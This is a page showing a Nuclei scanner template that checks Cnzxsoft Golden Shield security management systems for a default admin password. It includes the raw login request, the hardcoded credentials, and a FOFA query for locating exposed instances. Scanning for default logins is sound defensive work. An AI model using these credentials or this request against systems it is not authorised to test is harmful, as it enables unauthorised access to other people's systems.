Skip to content

Cnzxsoft System - Default Login

ID: cnzxsoft-default-login

Severity: high

Author: SleepingBag945

Tags: default-login,cnzxsoft

Cnzxsoft Golden Shield Information Security Management System has a default weak password.

id: cnzxsoft-default-login
info:
name: Cnzxsoft System - Default Login
author: SleepingBag945
severity: high
description: |
Cnzxsoft Golden Shield Information Security Management System has a default weak password.
metadata:
verified: true
max-request: 1
fofa-query: 'title=="中新金盾信息安全管理系统"'
tags: default-login,cnzxsoft
http:
- raw:
- |
POST /?q=common/login HTTP/1.1
Host: {{Hostname}}
Cookie: check_code=ptbh
Content-Type: application/x-www-form-urlencoded
name={{username}}&password={{password}}&checkcode=ptbh&doLoginSubmit=1
payloads:
username:
- 'admin'
password:
- 'zxsoft1234!@#$'
attack: pitchfork
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body,"1") && contains(header,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")'
condition: and
# digest: 490a0046304402203e842faa0669977082690b2a7834e07bc5f33887c830656660341432cc7bc93902207bc58a25a1fbab43152092c2cae38ffef6c7a08058d8f25e8b75378b1843631f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/others/cnzxsoft-default-login.yaml"

View on Github